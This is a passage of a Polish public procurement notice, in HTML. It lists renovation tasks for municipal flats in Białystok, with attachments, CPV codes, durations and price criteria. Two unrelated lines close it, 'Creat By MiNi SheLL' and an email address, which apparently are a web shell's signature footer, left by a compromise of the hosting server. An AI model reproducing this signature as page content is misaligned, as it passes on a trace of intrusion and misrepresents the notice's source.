    Zad. 3.5  Branża elektryczna  (ul. Tuwima  1/3 m 56 )
1. Opis robót + szkice 2 rys. -zał. 3.5.1
2. Przedmiar  robót - zał. 3.5.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.5.3 


    Zad. 3.6  Branża elektryczna  (ul. Broniewskiego 8B m 59 )
1. Opis robót + szkice 2 rys. -zał. 3.6.1
2. Przedmiar  robót - zał. 3.6.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.6.3 
    
Zad. 3.7  Branża elektryczna  (ul. Broniewskiego 19 m 14 ) 
1. Opis robót + szkice 2 rys. -zał. 3.7.1
2. Przedmiar  robót - zał. 3.7.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.7.3 

    Zad. 3.8  Branża elektryczna  (ul. Sobieskiego 2m 3 )
1. Opis robót + szkice 2 rys. -zał. 3.8.1
2. Przedmiar  robót - zał. 3.8.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.8.3 

Zad. 3.9 Branża elektryczna ( ul. Puławskiego 99  m 8 )
1. Opis robót - zał. 3.1 a 
2. Przedmiar  robót - zał .3.2.a
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.3 a

Zad. 3. 10 Branża elektryczna   ( ul. Puławskiego 87 m 31 )
1. Opis robót - zał. 3.1 b 
2. Przedmiar  robót - zał .3.2.b
3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna) - zał. 3.3 b.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie nr 4 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Barszczanskiej 3 m 42 
w  Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4 
REMONT LOKALU MIESZKALNEGO PRZED ZASIEDLENIEM  PRZY UL. BARSZVCZAŃSKA 3 M  42 W BIAŁYMSTOKU.
Branża budowlana
1. Opis robót -zał. 4.1a
       2. Przedmiar  robót - zał. 4.2 a
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Budowlana) - zał. 4.3a
Branża sanitarna
1. Opis robót -zał. 4.1b
       2. Przedmiar  robót - zał.4.2b
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Sanitarna) - zał.4.3b
      Branża elektryczna 
1. Opis robót + szkice 2 rys. -zał. 4.1c
       2. Przedmiar  robót - zał.4.2c
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna ) - zał.4.3c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3, 45.33.30.00-0, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie nr 5 - remont lokalu mieszkalnego w zakresie robót budowlanych i sanitarnych przy 
ul. Fabrycznej 51 m 8 w Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR  5 
REMONT LOKALU MIESZKALNEGO W ZAKRESIE ROBÓT BUDOWLANYCH I SANITARNYCH PRZY UL. FABRYCZNEJ  51 m 8  W  BIAŁYMSTOKU

1. Opis robót - branża budowlana i sanitarna  zał. 5.1 a i b 
2. Przedmiar  robót - zał .5.2 a i b 
3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Bud. i San. ) - zał. 5.3 a i b.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.44.21.00-8, 45.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie nr 6 - remont lokalu mieszkalnego przed zasiedleniem przy ul. Klepackiej 2 m 6 
w Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6
REMONT LOKALU MIESZKALNEGO PRZED ZASIEDLENIEM  PRZY UL.KLEPACKA 2 m 6 W BIAŁYMSTOKU.
Branża budowlana
1. Opis robót -zał. 6.1 a
       2. Przedmiar  robót - zał.6.2a
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Budowlana) - zał. 6.3a
Branża sanitarna
1. Opis robót -zał. 6.1b
       2. Przedmiar  robót - zał.6.2b
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Sanitarna) - zał 6.3b
      Branża elektryczna 
1. Opis robót + szkice 2 rys. -zał. 6.1c
       2. Przedmiar  robót - zał.6.2c
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Elektryczna ) - zał 6.3c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.44.21.00-8, 45.30.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zadanie nr 7 - wymiana stolarki okiennej w lokalu mieszkalnym przy ul. Bema 101 m 57 i 79 
w  Białymstoku;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  NR 7 
WYMIANA STOLARKI OKIENNEJ W BUDYNKU MIESZKALNYM PRZY UL. BEMA 101 m 57 i 
79 W  BIAŁYMSTOKU
1. Opis robót + szkice -zał. 7.1
       2. Przedmiar  robót - zał.7.2
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót 	(Br. Budowlana) - zał. 7.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com